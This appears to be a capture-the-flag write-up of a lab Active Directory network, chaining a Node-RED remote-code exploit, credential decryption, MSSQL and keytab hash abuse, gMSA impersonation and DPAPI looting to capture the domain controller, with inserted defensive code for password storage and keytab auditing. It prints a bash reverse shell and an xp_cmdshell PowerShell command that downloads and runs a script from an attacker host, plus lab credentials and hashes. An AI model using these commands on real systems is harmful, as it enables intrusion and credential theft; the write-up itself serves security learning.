Executive Summary

This report documents a simulated penetration test that assessed the security posture of a corporate network, with the ultimate goal of compromising a domain controller. The test was designed to emulate a sophisticated adversary that chains several cycles of lateral movement and privilege escalation. It used a variety of attack techniques that map to the MITRE ATT&CK framework, each chosen to exploit a specific weakness in the network.
Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.
Enumeration
| Machine ID | IP |
|---|---|
| DC.tengu.vl | 10.10.168.117 |
| SQL.tengu.vl | 10.10.168.118 |
| (unnamed Linux host) | 10.10.168.119 |

10.10.168.117
| Port | Service | Version |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services; rdp-ntlm-info: Target_Name TENGU, NetBIOS_Domain_Name TENGU, NetBIOS_Computer_Name DC, DNS_Domain_Name tengu.vl, DNS_Computer_Name DC.tengu.vl, Product_Version 10.0.20348; ssl-cert: Subject commonName=DC.tengu.vl, Not valid before 2024-03-10T13:32:17 |
10.10.168.118
| Port | Service | Version |
|---|---|---|
| 3389 | ms-wbt-server | Microsoft Terminal Services; rdp-ntlm-info: Target_Name TENGU, NetBIOS_Domain_Name TENGU, NetBIOS_Computer_Name SQL, DNS_Domain_Name tengu.vl, DNS_Computer_Name SQL.tengu.vl, DNS_Tree_Name tengu.vl, Product_Version 10.0.20348; ssl-cert: Subject commonName=SQL.tengu.vl, Not valid before 2024-03-24T13:19:50 |
10.10.168.119
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 |
| 1880 | vsat-control? (Node-RED) | |

On the Linux machine a Node-RED instance was found on port 1880. A quick Google search leads me to:
https://gist.github.com/qkaiser/79459c3cb5ea6e658701c7d203a8c297
I ran the script.

```bash
python3 node-rce.py http://10.10.168.119:1880
nc -lvnp 80
bash -c 'exec bash -i &>/dev/tcp/10.8.2.41/8080 <&1'
```

Encrypted credential entry from the Node-RED data directory (flows_cred.json):

"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="

SSH key added for nodered_svc:

```bash
ssh-keygen
touch authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEGm9hQH1xLdejYYVfn27qnd0twKOQItI76hnvwz6pf9 jay@hacksafely" >> authorized_keys
ssh nodered_svc@10.10.168.119
```

t2_m.winters@tengu.vl
Node-RED Password Decrypt

```bash
#!/bin/bash
#
# Decrypt flows_cred.json from a Node-RED data directory
#
# Usage
#   ./node-red-decrypt-flows-cred.sh ./node_red_data
#
# The "$" value is <32 hex chars of IV><base64 ciphertext>. The AES-256-CTR key
# is sha256(_credentialSecret), read from .config.runtime.json in the same directory.
DATA_DIR="$1"
IV=$(jq -r '.["$"]' "$DATA_DIR/flows_cred.json" | cut -c 1-32)
KEY=$(jq -j '._credentialSecret' "$DATA_DIR/.config.runtime.json" | sha256sum | cut -c 1-64)
jq -j '.["$"]' "$DATA_DIR/flows_cred.json" | \
  cut -c 33- | \
  openssl enc -aes-256-ctr -d -base64 -A -iv "$IV" -K "$KEY"
```

```bash
./node_red_flows_cred_decrypt.sh ~/vulnlab/tengu
```

- need two files as per script (flows_cred.json and .config.runtime.json in the data directory)

Output:

```json
{"d237b4c16a396b9e":{"username":"nodered_connector","password":"DreamPuppyOverall25"}}
```
- Ligolo setup
cme mssql ips.txt -u nodered_connector -p 'DreamPuppyOverall25' --local-auth
10.10.168.118 sql.tengu.vl sql
10.10.168.117 tengudc.tengu.vl tengu.vl tengudc
impacket-mssqlclient nodered_connector:DreamPuppyOverall25@sql.tengu.vl
use Demo
select * from demo.information_schema.tables;
select * from users
b't2_m.winters' b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'
t2_m.winters
Tengu123
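The users table stores each password as a single 64-hex-character digest with no separate salt column, which is why the value recovered above could be turned back into a plaintext offline. As an added example (not part of the original writeup), the following Python shows how such a column should be stored and verified instead: a random per-user salt and an iterated PBKDF2-HMAC-SHA256 record, plus a small audit helper that flags bare digests in a dump. The sample rows are constructed; only the digest for t2_m.winters is taken from the query output above.

```python
import hashlib
import hmac
import re
import secrets

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000          # OWASP (2023) guidance for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
        if algorithm != ALGORITHM:
            return False
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
        )
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:            # malformed record: wrong field count, bad hex, bad int
        return False


# A bare MD5 / SHA-1 / SHA-256 hex digest: no salt, no work factor.
BARE_DIGEST = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$")


def audit_stored_hash(value: str) -> str:
    """Classify a users-table value: 'weak' (bare fast digest), 'ok' (our record), 'unknown'."""
    if BARE_DIGEST.match(value.strip().lower()):
        return "weak"
    if value.startswith(ALGORITHM + "$"):
        return "ok"
    return "unknown"


# Constructed sample rows in the shape of the users table above. The first digest is
# the one returned for t2_m.winters in the writeup; the second row is our own record.
SAMPLE_ROWS = {
    "t2_m.winters": "af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147",
    "demo_user": hash_password("correct horse battery staple"),
}

if __name__ == "__main__":
    for user, value in SAMPLE_ROWS.items():
        print(f"{user}: {audit_stored_hash(value)}")
```

Running the block prints `t2_m.winters: weak` and `demo_user: ok`; the audit helper is meant to be pointed at a full column dump so that every legacy row is found before, rather than after, someone else cracks it.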
su - t2_m.winters@tengu.vl
sudo -l
sudo su
cd /root
VL{2c6d9107958f338659c95a810e4938d5}
```bash
python2.7 ../../tools/KeytabParser/KeytabParser.py krb5.keytab
```

```json
{
  "NODERED$@TENGU.VL": {
    "keys": [
      {
        "EncType": "rc4-hmac",
        "Key": "1CEO4tsMA6o2Ecnvik2/SQ==",
        "KeyLength": 16,
        "Time": "2024-03-26 03:42:23"
      }
    ]
  }
}
```
python3 ../../tools/KeytabParser/KeyTabExtract/keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : TENGU.VL
SERVICE PRINCIPAL : NODERED$/
NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
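The keytab above carries an rc4-hmac key for NODERED$, and for that enctype the stored key is the machine account's NT hash, which is what both extractors report as "NTLM HASH". As an added example (not from the writeup or from either tool), the following Python parses the MIT keytab format directly and reports, without copying key bytes out of the file, which principals hold a legacy RC4 or DES key, so that an administrator can restrict those accounts to AES and rotate them. The sample keytab is constructed inside the code with filler key bytes; it is not the engagement's krb5.keytab.

```python
import struct
from datetime import datetime, timezone

# Kerberos enctype numbers (RFC 3961/3962/8009; rc4-hmac from MS-KILE).
ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
    23: "rc4-hmac",
}
# Legacy enctypes: for rc4-hmac the stored key IS the account's NT hash.
LEGACY_ENCTYPES = {1, 3, 23}


def _counted_octets(data, off):
    """Read a counted_octet_string (uint16 big-endian length + bytes) at off."""
    (length,) = struct.unpack_from(">H", data, off)
    off += 2
    return bytes(data[off:off + length]), off + length


def parse_keytab(data):
    """Parse an MIT keytab (format 0x0501 or 0x0502) into a list of entry dicts.

    Key bytes are deliberately not returned, only their length: an audit
    should not need to copy secret material out of the file.
    """
    (version,) = struct.unpack_from(">H", data, 0)
    if version not in (0x0501, 0x0502):
        raise ValueError(f"unsupported keytab version {version:#06x}")
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                 # a negative size marks a deleted slot
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        if version == 0x0501:        # v1 counted the realm as a component
            ncomp -= 1
        realm, off = _counted_octets(data, off)
        comps = []
        for _ in range(ncomp):
            c, off = _counted_octets(data, off)
            comps.append(c.decode("utf-8", "replace"))
        if version == 0x0502:
            off += 4                 # uint32 name_type, present only in v2
        timestamp, vno8 = struct.unpack_from(">IB", data, off)
        off += 5
        (enctype,) = struct.unpack_from(">H", data, off)
        off += 2
        key, off = _counted_octets(data, off)
        kvno = vno8
        if end - off >= 4:           # optional 32-bit vno overrides vno8 when nonzero
            (vno32,) = struct.unpack_from(">I", data, off)
            if vno32:
                kvno = vno32
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode("utf-8", "replace"),
            "enctype": enctype,
            "enctype_name": ENCTYPE_NAMES.get(enctype, f"enctype-{enctype}"),
            "kvno": kvno,
            "key_len": len(key),
            "timestamp": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        })
        off = end
    return entries


def audit_keytab(entries):
    """One finding per entry whose key is a legacy enctype (RC4 = NT hash, or DES)."""
    return [
        f"{e['principal']} kvno {e['kvno']}: {e['enctype_name']} key present; anyone who "
        "reads this file can reuse it as-is. Allow only AES for the account "
        "(msDS-SupportedEncryptionTypes) and rotate its key."
        for e in entries if e["enctype"] in LEGACY_ENCTYPES
    ]


# --- Constructed sample (NOT the keytab from the engagement): one machine account
# with an RC4 key and an AES-256 key. Key bytes are filler.
def _octets(b):
    return struct.pack(">H", len(b)) + b


def _entry(realm, components, enctype, key, kvno, ts):
    body = struct.pack(">H", len(components)) + _octets(realm.encode())
    for c in components:
        body += _octets(c.encode())
    body += struct.pack(">IIB", 1, ts, kvno & 0xFF)   # name_type=1 (NT-PRINCIPAL), timestamp, vno8
    body += struct.pack(">H", enctype) + _octets(key)
    body += struct.pack(">I", kvno)                    # trailing 32-bit vno
    return struct.pack(">i", len(body)) + body


_TS = int(datetime(2024, 3, 26, 3, 42, 23, tzinfo=timezone.utc).timestamp())
SAMPLE_KEYTAB = (
    b"\x05\x02"
    + _entry("TENGU.VL", ["NODERED$"], 23, b"\x11" * 16, 2, _TS)
    + _entry("TENGU.VL", ["NODERED$"], 18, b"\x22" * 32, 2, _TS)
)

if __name__ == "__main__":
    found = parse_keytab(SAMPLE_KEYTAB)
    for e in found:
        print(e)
    for line in audit_keytab(found):
        print("[!]", line)
```

On a real file, `parse_keytab(open("/etc/krb5.keytab", "rb").read())` gives the same inventory; the point of the audit is that a host whose keytab only holds AES keys does not hand over an NT hash the way the one in this writeup did.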
gMSA Password
cme ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
dd258bdca5a05840758676a2ca90cf45
nxc ldap dc.tengu.vl -u 'gMSA01$' -H dd258bdca5a05840758676a2ca90cf45 --bloodhound -c All -d tengu.vl --dns-server 10.10.168.117
impacket-getST -self -impersonate 'T1_M.WINTERS' 'tengu.vl/gMSA01$:@sql.tengu.vl' -hashes :dd258bdca5a05840758676a2ca90cf45 -spn 'MSSQLSvc/sql.tengu.vl'
impacket-mssqlclient -k sql.tengu.vl
enable_xp_cmdshell
Change from ligolo to sliver socks5 proxy
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.8.2.41/amsi64.txt'') | IEX"'
- SeImpersonate method 3
VL{e1f0df5961b9a6e06e9a3836cf414d56}
sharpdpapi machinetriage /showall
UserName : TENGU\T0_c.fowler
Credential : UntrimmedDisplaceModify25
```ini
[libdefaults]
    default_realm = TENGU.VL

# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
    fcc-mit-ticketflags = true

# The following libdefaults parameters are only for Heimdal Kerberos.
    fcc-mit-ticketflags = true

[realms]
    TENGU.VL = {
        kdc = dc.tengu.vl
        admin_server = dc.tengu.vl
    }

[domain_realm]
    .tengu.vl = TENGU.VL
```
```bash
kinit
proxychains kvno CIFS/dc.tengu.vl@TENGU.VL
proxychains impacket-wmiexec dc.tengu.vl -k
```
VL{6f106b09ff464e7ef0b36483e348dbc9}